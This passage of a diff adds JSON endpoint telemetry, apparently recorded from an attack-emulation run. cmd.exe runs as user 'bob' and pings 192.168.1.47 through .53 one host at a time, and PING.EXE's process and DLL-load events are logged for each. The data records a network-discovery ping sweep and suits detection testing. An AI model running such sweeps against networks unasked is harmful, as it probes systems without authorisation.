"{42FC7E13-CB64-5C05-0000-0010D2E45101}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 7180, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572201990000, + "unique_pid": "{42FC7E13-CB64-5C05-0000-0010D2E45101}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 7180, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572201990000, + "unique_pid": "{42FC7E13-CB64-5C05-0000-0010D2E45101}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 7180, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572201990000, + "unique_pid": "{42FC7E13-CB64-5C05-0000-0010D2E45101}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 7180, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572201990000, + "unique_pid": "{42FC7E13-CB64-5C05-0000-0010D2E45101}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 7180, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572201990000, + "unique_pid": "{42FC7E13-CB64-5C05-0000-0010D2E45101}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 7180, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572201990000, + "unique_pid": "{42FC7E13-CB64-5C05-0000-0010D2E45101}" + }, + { + "event_type": "process", + "pid": 7180, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572206990000, + "unique_pid": "{42FC7E13-CB64-5C05-0000-0010D2E45101}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.47", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 7264, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572207140000, + "unique_pid": "{42FC7E13-CB64-5C05-0000-00104DE75101}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 7264, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572207140000, + "unique_pid": "{42FC7E13-CB64-5C05-0000-00104DE75101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 7264, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572207140000, + "unique_pid": "{42FC7E13-CB64-5C05-0000-00104DE75101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 7264, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572207140000, + "unique_pid": "{42FC7E13-CB64-5C05-0000-00104DE75101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 7264, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572207140000, + "unique_pid": "{42FC7E13-CB64-5C05-0000-00104DE75101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 7264, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572207140000, + "unique_pid": "{42FC7E13-CB64-5C05-0000-00104DE75101}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 7264, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572207140000, + "unique_pid": "{42FC7E13-CB64-5C05-0000-00104DE75101}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 7264, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572207140000, + "unique_pid": "{42FC7E13-CB64-5C05-0000-00104DE75101}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 7264, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572207140000, + "unique_pid": "{42FC7E13-CB64-5C05-0000-00104DE75101}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 7264, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572207140000, + "unique_pid": "{42FC7E13-CB64-5C05-0000-00104DE75101}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 7264, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572207140000, + "unique_pid": "{42FC7E13-CB64-5C05-0000-00104DE75101}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 7264, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572207140000, + "unique_pid": "{42FC7E13-CB64-5C05-0000-00104DE75101}" + }, + { + "event_type": "process", + "pid": 7264, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572211840000, + "unique_pid": "{42FC7E13-CB64-5C05-0000-00104DE75101}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.48", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 4136, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572211980000, + "unique_pid": "{42FC7E13-CB65-5C05-0000-0010BEE95101}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 4136, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572211990000, + "unique_pid": "{42FC7E13-CB65-5C05-0000-0010BEE95101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 4136, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572211990000, + "unique_pid": "{42FC7E13-CB65-5C05-0000-0010BEE95101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 4136, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572211990000, + "unique_pid": "{42FC7E13-CB65-5C05-0000-0010BEE95101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 4136, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572211990000, + "unique_pid": "{42FC7E13-CB65-5C05-0000-0010BEE95101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 4136, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572211990000, + "unique_pid": "{42FC7E13-CB65-5C05-0000-0010BEE95101}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 4136, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572211990000, + "unique_pid": "{42FC7E13-CB65-5C05-0000-0010BEE95101}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 4136, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572211990000, + "unique_pid": "{42FC7E13-CB65-5C05-0000-0010BEE95101}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 4136, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572211990000, + "unique_pid": "{42FC7E13-CB65-5C05-0000-0010BEE95101}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 4136, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572211990000, + "unique_pid": "{42FC7E13-CB65-5C05-0000-0010BEE95101}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 4136, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572211990000, + "unique_pid": "{42FC7E13-CB65-5C05-0000-0010BEE95101}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 4136, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572211990000, + "unique_pid": "{42FC7E13-CB65-5C05-0000-0010BEE95101}" + }, + { + "event_type": "process", + "pid": 4136, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572216830000, + "unique_pid": "{42FC7E13-CB65-5C05-0000-0010BEE95101}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.49", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 3952, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572216980000, + "unique_pid": "{42FC7E13-CB65-5C05-0000-001039EC5101}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 3952, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572216980000, + "unique_pid": "{42FC7E13-CB65-5C05-0000-001039EC5101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 3952, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572216980000, + "unique_pid": "{42FC7E13-CB65-5C05-0000-001039EC5101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 3952, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572216980000, + "unique_pid": "{42FC7E13-CB65-5C05-0000-001039EC5101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 3952, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572216980000, + "unique_pid": "{42FC7E13-CB65-5C05-0000-001039EC5101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 3952, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572216980000, + "unique_pid": "{42FC7E13-CB65-5C05-0000-001039EC5101}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 3952, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572216980000, + "unique_pid": "{42FC7E13-CB65-5C05-0000-001039EC5101}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 3952, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572216980000, + "unique_pid": "{42FC7E13-CB65-5C05-0000-001039EC5101}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 3952, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572216980000, + "unique_pid": "{42FC7E13-CB65-5C05-0000-001039EC5101}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 3952, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572216980000, + "unique_pid": "{42FC7E13-CB65-5C05-0000-001039EC5101}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 3952, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572216980000, + "unique_pid": "{42FC7E13-CB65-5C05-0000-001039EC5101}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 3952, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572216980000, + "unique_pid": "{42FC7E13-CB65-5C05-0000-001039EC5101}" + }, + { + "event_type": "process", + "pid": 3952, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572221990000, + "unique_pid": "{42FC7E13-CB65-5C05-0000-001039EC5101}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.50", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 3824, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572222140000, + "unique_pid": "{42FC7E13-CB66-5C05-0000-0010A8EE5101}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 3824, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572222150000, + "unique_pid": "{42FC7E13-CB66-5C05-0000-0010A8EE5101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 3824, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572222150000, + "unique_pid": "{42FC7E13-CB66-5C05-0000-0010A8EE5101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 3824, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572222150000, + "unique_pid": "{42FC7E13-CB66-5C05-0000-0010A8EE5101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 3824, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572222150000, + "unique_pid": "{42FC7E13-CB66-5C05-0000-0010A8EE5101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 3824, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572222150000, + "unique_pid": "{42FC7E13-CB66-5C05-0000-0010A8EE5101}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 3824, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572222150000, + "unique_pid": "{42FC7E13-CB66-5C05-0000-0010A8EE5101}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 3824, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572222150000, + "unique_pid": "{42FC7E13-CB66-5C05-0000-0010A8EE5101}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 3824, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572222150000, + "unique_pid": "{42FC7E13-CB66-5C05-0000-0010A8EE5101}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 3824, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572222150000, + "unique_pid": "{42FC7E13-CB66-5C05-0000-0010A8EE5101}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 3824, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572222150000, + "unique_pid": "{42FC7E13-CB66-5C05-0000-0010A8EE5101}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 3824, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572222150000, + "unique_pid": "{42FC7E13-CB66-5C05-0000-0010A8EE5101}" + }, + { + "event_type": "process", + "pid": 3824, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572226830000, + "unique_pid": "{42FC7E13-CB66-5C05-0000-0010A8EE5101}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.51", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 2284, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572226980000, + "unique_pid": "{42FC7E13-CB66-5C05-0000-001026F15101}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 2284, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572226980000, + "unique_pid": "{42FC7E13-CB66-5C05-0000-001026F15101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 2284, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572226980000, + "unique_pid": "{42FC7E13-CB66-5C05-0000-001026F15101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 2284, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572226980000, + "unique_pid": "{42FC7E13-CB66-5C05-0000-001026F15101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 2284, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572226980000, + "unique_pid": "{42FC7E13-CB66-5C05-0000-001026F15101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 2284, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572226980000, + "unique_pid": "{42FC7E13-CB66-5C05-0000-001026F15101}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 2284, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572226980000, + "unique_pid": "{42FC7E13-CB66-5C05-0000-001026F15101}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 2284, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572226980000, + "unique_pid": "{42FC7E13-CB66-5C05-0000-001026F15101}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 2284, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572226980000, + "unique_pid": "{42FC7E13-CB66-5C05-0000-001026F15101}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 2284, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572226980000, + "unique_pid": "{42FC7E13-CB66-5C05-0000-001026F15101}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 2284, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572226980000, + "unique_pid": "{42FC7E13-CB66-5C05-0000-001026F15101}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 2284, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572226980000, + "unique_pid": "{42FC7E13-CB66-5C05-0000-001026F15101}" + }, + { + "event_type": "process", + "pid": 2284, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572231830000, + "unique_pid": "{42FC7E13-CB66-5C05-0000-001026F15101}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.52", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 6300, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572231980000, + "unique_pid": "{42FC7E13-CB67-5C05-0000-001093F35101}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 6300, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572231990000, + "unique_pid": "{42FC7E13-CB67-5C05-0000-001093F35101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 6300, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572231990000, + "unique_pid": "{42FC7E13-CB67-5C05-0000-001093F35101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 6300, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572231990000, + "unique_pid": "{42FC7E13-CB67-5C05-0000-001093F35101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 6300, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572231990000, + "unique_pid": "{42FC7E13-CB67-5C05-0000-001093F35101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 6300, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572231990000, + "unique_pid": "{42FC7E13-CB67-5C05-0000-001093F35101}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 6300, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572231990000, + "unique_pid": "{42FC7E13-CB67-5C05-0000-001093F35101}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 6300, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572231990000, + "unique_pid": "{42FC7E13-CB67-5C05-0000-001093F35101}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 6300, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572231990000, + "unique_pid": "{42FC7E13-CB67-5C05-0000-001093F35101}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 6300, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572231990000, + "unique_pid": "{42FC7E13-CB67-5C05-0000-001093F35101}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 6300, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572231990000, + "unique_pid": "{42FC7E13-CB67-5C05-0000-001093F35101}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 6300, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572231990000, + "unique_pid": "{42FC7E13-CB67-5C05-0000-001093F35101}" + }, + { + "event_type": "process", + "pid": 6300, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572236990000, + "unique_pid": "{42FC7E13-CB67-5C05-0000-001093F35101}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.53", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 3380, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572237140000, + "unique_pid": "{42FC7E13-CB67-5C05-0000-001011F65101}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 3380, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572237140000, + "unique_pid": "{42FC7E13-CB67-5C05-0000-001011F65101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 3380, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572237140000, + "unique_pid": "{42FC7E13-CB67-5C05-0000-001011F65101}" + 